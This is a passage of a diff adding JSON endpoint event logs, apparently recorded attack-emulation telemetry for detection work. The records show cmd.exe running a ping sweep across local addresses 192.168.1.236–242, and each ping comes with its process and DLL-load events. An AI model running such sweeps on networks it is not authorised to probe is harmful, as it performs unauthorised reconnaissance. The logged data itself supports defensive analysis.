"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573142300000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "event_type": "process", + "pid": 3824, + "process_name": "PING.EXE", + 
"process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-0010B4DA5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.236", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6364, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573147029984, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" 
+ }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + 
"pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573146980000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "event_type": "process", + "pid": 6364, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573151830000, + "unique_pid": "{42FC7E13-CBC2-5C05-0000-001026DD5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.237", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2912, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + 
"image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2912, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573151980000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "event_type": "process", + "pid": 2912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573156990000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-0010A7DF5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.238", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2788, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573157130000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + 
"image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573157140000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "event_type": "process", + "pid": 2788, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573161830000, + "unique_pid": "{42FC7E13-CBC3-5C05-0000-001017E25301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.239", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1344, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573161970000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161830000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": 
"C:\\Windows\\System32\\ntdll.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573161980000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "event_type": "process", + "pid": 1344, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573166990000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001098E45301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.240", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3552, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573167210000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167140000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167300000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573167300000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "event_type": "process", + "pid": 3552, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573171830000, + "unique_pid": "{42FC7E13-CBC4-5C05-0000-001007E75301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.241", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3152, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573171980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "event_type": "process", + "pid": 3152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573176830000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-001084E95301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.242", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6756, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573176980000, + "unique_pid": "{42FC7E13-CBC5-5C05-0000-0010F8EB5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6756, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
